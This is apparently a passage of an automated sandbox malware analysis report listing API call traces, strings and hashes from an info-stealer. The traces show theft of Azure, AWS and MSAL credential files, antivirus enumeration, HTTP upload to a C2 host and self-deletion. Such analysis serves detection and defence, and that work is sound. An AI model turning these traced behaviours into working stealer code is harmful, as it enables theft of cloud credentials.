                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00036501
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.azure\), ref: 0003651E
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036018
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindFirstFileA.KERNEL32(?,?), ref: 0003602F
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB4), ref: 00036050
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB8), ref: 0003606A
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036091
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056647), ref: 000360A5
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360C2
                                                                                                                                                                                            • Part of subcall function 00035FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000360EF
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?), ref: 00036125
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD0), ref: 00036137
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 0003614A
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD4), ref: 0003615C
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 00036170
                                                                                                                                                                                          • _memset.LIBCMT ref: 00036556
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00036578
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.aws\), ref: 00036595
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360D9
                                                                                                                                                                                            • Part of subcall function 00035FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00036229
                                                                                                                                                                                            • Part of subcall function 00035FD1: DeleteFileA.KERNEL32(?), ref: 0003629D
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindNextFileA.KERNEL32(?,?), ref: 000362FF
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindClose.KERNEL32(?), ref: 00036313
                                                                                                                                                                                          • _memset.LIBCMT ref: 000365CA
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 000365EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00036609
                                                                                                                                                                                          • _memset.LIBCMT ref: 0003663E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                          • API String ID: 780282842-974132213
                                                                                                                                                                                          • Opcode ID: a08bcb866d3855fc6401c809d068d57594ca373981eacdb07932b6d961e7aa2e
                                                                                                                                                                                          • Instruction ID: dc1f8866fba2ceb63ab00cb6dcf93c8e199b6d13ad12bd916eebd89f7e4e1d1c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a08bcb866d3855fc6401c809d068d57594ca373981eacdb07932b6d961e7aa2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641B675D4022CABDF15E760EC4BFDE737CAB08701F9444A5BB04A7192EAB19AC88F51
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002AC8A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002AD94
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002AD9B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000573DC,00000000), ref: 0002AE4C
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000573E0), ref: 0002AE74
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AE98
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573E4), ref: 0002AEA4
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEAE
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573E8), ref: 0002AEBA
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEC4
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573EC), ref: 0002AED0
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEDA
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573F0), ref: 0002AEE6
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AEF0
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573F4), ref: 0002AEFC
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AF06
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573F8), ref: 0002AF12
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 0002AF1C
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573FC), ref: 0002AF28
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002AF7A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002AF95
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002AFD8
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1956182324-0
                                                                                                                                                                                          • Opcode ID: 4657ac083c7fae2e9edcc6dc5bc500fac0faef63cc25ac2145d6ab8d611d5c19
                                                                                                                                                                                          • Instruction ID: 04a4a02b7bfbae56e90d521622fa9653e7a47439f95884e67c6880a300fd41ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4657ac083c7fae2e9edcc6dc5bc500fac0faef63cc25ac2145d6ab8d611d5c19
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38C10A32904118EFDF12ABA0FC4A8EE7B79EF08315F514065FA05B7062DB316E869F61
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000213B9), ref: 00030C5F
                                                                                                                                                                                            • Part of subcall function 00030C53: HeapAlloc.KERNEL32(00000000,?,?,?,000213B9), ref: 00030C66
                                                                                                                                                                                            • Part of subcall function 00030C53: GetUserNameA.ADVAPI32(00000000,000213B9), ref: 00030C7A
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0003858F), ref: 000370DD
                                                                                                                                                                                          • OpenEventA.KERNEL32(esvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.exe,00000000,?,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000370EC
                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,000566DA), ref: 0003760A
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000376CB
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000376E4
                                                                                                                                                                                            • Part of subcall function 00024B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00024BCD
                                                                                                                                                                                            • Part of subcall function 00024B2E: StrCmpCA.SHLWAPI(?), ref: 00024BEB
                                                                                                                                                                                            • Part of subcall function 000339C2: StrCmpCA.SHLWAPI(?,block,?,?,00037744), ref: 000339D7
                                                                                                                                                                                            • Part of subcall function 000339C2: ExitProcess.KERNEL32 ref: 000339E2
                                                                                                                                                                                            • Part of subcall function 00025F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00025FD8
                                                                                                                                                                                            • Part of subcall function 00025F39: StrCmpCA.SHLWAPI(?), ref: 00025FF6
                                                                                                                                                                                            • Part of subcall function 00033198: strtok_s.MSVCRT ref: 000331B7
                                                                                                                                                                                            • Part of subcall function 00033198: strtok_s.MSVCRT ref: 0003323A
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00037A9A
                                                                                                                                                                                            • Part of subcall function 00025F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0002618E
                                                                                                                                                                                            • Part of subcall function 00025F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000261D2
                                                                                                                                                                                            • Part of subcall function 00025F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026200
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0003858F), ref: 00037100
                                                                                                                                                                                            • Part of subcall function 0003257F: __EH_prolog3_catch_GS.LIBCMT ref: 00032589
                                                                                                                                                                                            • Part of subcall function 0003257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00037E31,.exe,00056CCC,00056CC8,00056CC4,00056CC0,00056CBC,00056CB8,00056CB4,00056CB0,00056CAC,00056CA8,00056CA4), ref: 000325A8
                                                                                                                                                                                            • Part of subcall function 0003257F: Process32First.KERNEL32(00000000,00000128), ref: 000325B8
                                                                                                                                                                                            • Part of subcall function 0003257F: Process32Next.KERNEL32(00000000,00000128), ref: 000325CA
                                                                                                                                                                                            • Part of subcall function 0003257F: StrCmpCA.SHLWAPI(?), ref: 000325DC
                                                                                                                                                                                            • Part of subcall function 0003257F: CloseHandle.KERNEL32(00000000), ref: 000325F0
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00038000
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • org, xrefs: 00037EE7
                                                                                                                                                                                          • esvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.exe, xrefs: 000370D5, 000370EB
                                                                                                                                                                                          • _DEBUG.zip, xrefs: 00037F35
                                                                                                                                                                                          • cowod., xrefs: 00037E7B
                                                                                                                                                                                          • .exe, xrefs: 00037549
                                                                                                                                                                                          • http://, xrefs: 00037E57
                                                                                                                                                                                          • .exe, xrefs: 00037E04
                                                                                                                                                                                          • hopto, xrefs: 00037E9F
                                                                                                                                                                                          • 744fd163d6d4e0ac37e4032bcbfbb6af, xrefs: 0003770C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                          • String ID: .exe$.exe$744fd163d6d4e0ac37e4032bcbfbb6af$_DEBUG.zip$cowod.$esvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.exe$hopto$http://$org
                                                                                                                                                                                          • API String ID: 305159127-4117912400
                                                                                                                                                                                          • Opcode ID: 99d2ec2cd0d9fdae22bc6150f03dae8a9fc5fd260b80452a229df69d8d7fe252
                                                                                                                                                                                          • Instruction ID: 9f7d77797738e7d6ec25c2075f9927372aa16630f12ecab156c073f891781504
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99d2ec2cd0d9fdae22bc6150f03dae8a9fc5fd260b80452a229df69d8d7fe252
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB923E325493559FCA21FF64D8436CEB7E8FF80300F814929F99867152DB71AA0E8B93
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 000335EA
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,true), ref: 000336AC
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0003376E
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 0003379F
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 000337DB
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00033817
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00033853
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 0003388F
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 000338CB
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 0003398F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                          • API String ID: 2116072422-2658103896
                                                                                                                                                                                          • Opcode ID: d6d11bf3c20e5c439549a02f1ba520e0e1302be2f37d86616cab92b457cf4f2f
                                                                                                                                                                                          • Instruction ID: ce0129f565defbf35441ce0582b16b1bbd9768df6d30d8aa95a690d5c4401431
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6d11bf3c20e5c439549a02f1ba520e0e1302be2f37d86616cab92b457cf4f2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B11B75905128ABCF61EF54EC89ADA77B8BF18300F0141E5E949A7262EB709FC4CF50
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002527E
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00025285
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000252A7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 000252C1
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000252F1
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00025330
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00025360
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0002536B
                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00025394
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 000253DA
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00025439
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00025445
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00025451
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                          • API String ID: 442264750-1805413626
                                                                                                                                                                                          • Opcode ID: f4a9af50ddd424c3f249150289ad8ce7c980e2464132cec997bf325231bebcbe
                                                                                                                                                                                          • Instruction ID: bdd3b9fa367a41f41da2fc2dc1824cbe7f6892f1cfdf62faf11b1b9ca63e8c9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4a9af50ddd424c3f249150289ad8ce7c980e2464132cec997bf325231bebcbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: F451077190092CAFDF21AF64EC89BEFBBB8EB08346F4101E5F909A6151D6705EC18F65
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0003199E
                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,00000030,00033F67,?,AV: ,000568C4,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 000319AD
                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000319BE
                                                                                                                                                                                          • CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 000319D8
                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031A0E
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00031A5D
                                                                                                                                                                                            • Part of subcall function 00031D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00031A80,?), ref: 00031D4A
                                                                                                                                                                                            • Part of subcall function 00031D42: CharToOemW.USER32(?,00000000), ref: 00031D56
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00031A8B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                          • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                          • API String ID: 4288110179-315474579
                                                                                                                                                                                          • Opcode ID: 4e738acad40d0cba77ae55bf6a9bd5f547a5faf7a0a95efcb42d2c1d35153c85
                                                                                                                                                                                          • Instruction ID: 4c2b246b8ca8741f5d8c102e326abe1615b2fd076df18a9d2e3c04180e0b4da1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e738acad40d0cba77ae55bf6a9bd5f547a5faf7a0a95efcb42d2c1d35153c85
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE316C70A04345BBDB21DB91DC49EEFBBBCEFC9B12F104619F611AB1A0C6759A40CB21
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000212A7
                                                                                                                                                                                          • _memset.LIBCMT ref: 000212B6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9EC), ref: 000212D0
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9F0), ref: 000212DE
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9F4), ref: 000212EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9F8), ref: 000212FA
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9FC), ref: 00021308
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA00), ref: 00021316
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA04), ref: 00021324
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA08), ref: 00021332
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA0C), ref: 00021340
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA10), ref: 0002134E
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA14), ref: 0002135C
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA18), ref: 0002136A
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA1C), ref: 00021378
                                                                                                                                                                                            • Part of subcall function 00030C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00021385), ref: 00030C91
                                                                                                                                                                                            • Part of subcall function 00030C85: HeapAlloc.KERNEL32(00000000,?,?,?,00021385), ref: 00030C98
                                                                                                                                                                                            • Part of subcall function 00030C85: GetComputerNameA.KERNEL32(00000000,00021385), ref: 00030CAC
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 000213E3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1553874529-0
                                                                                                                                                                                          • Opcode ID: f3c47409959acabb9972f75ac7148195a4c886e542849ed5a93eafe65b1900ab
                                                                                                                                                                                          • Instruction ID: 83e47f58cc5d08f6504252525770c66628059314c9e757e58cfee30f88e850d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3c47409959acabb9972f75ac7148195a4c886e542849ed5a93eafe65b1900ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C4163B2E0423C66CB20DB709C59BDB7FAD9F25311F500691A998E7041D7749B88CB91
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0005670F,00000000,?,?), ref: 00031273
                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000312B0
                                                                                                                                                                                          • wsprintfA.USER32 ref: 000312DD
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000312FC
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00031332
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00031347
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00056E8C), ref: 000313DC
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00031446
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00031466
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00031472
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                          • String ID: - $%s\%s$?
                                                                                                                                                                                          • API String ID: 2394436309-3278919252
                                                                                                                                                                                          • Opcode ID: fec0862b1387fe4c956ce1e67ffeed99b880d35d54d3e8de9f35638d87552bc9
                                                                                                                                                                                          • Instruction ID: 525ab7cd864b67e9d3374e35b4e0876a8a9a8d6411fd5294a9baf8ae3c469dce
                                                                                                                                                                                          • Opcode Fuzzy Hash: fec0862b1387fe4c956ce1e67ffeed99b880d35d54d3e8de9f35638d87552bc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F761967590012CAAEF219B55ED85EDEB7BCEB49304F5142E5A609A3112DF30AEC9CF60
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00038296
                                                                                                                                                                                          • _memset.LIBCMT ref: 000382A5
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 000382BA
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00038456
                                                                                                                                                                                          • _memset.LIBCMT ref: 00038465
                                                                                                                                                                                          • _memset.LIBCMT ref: 00038477
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00038487
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
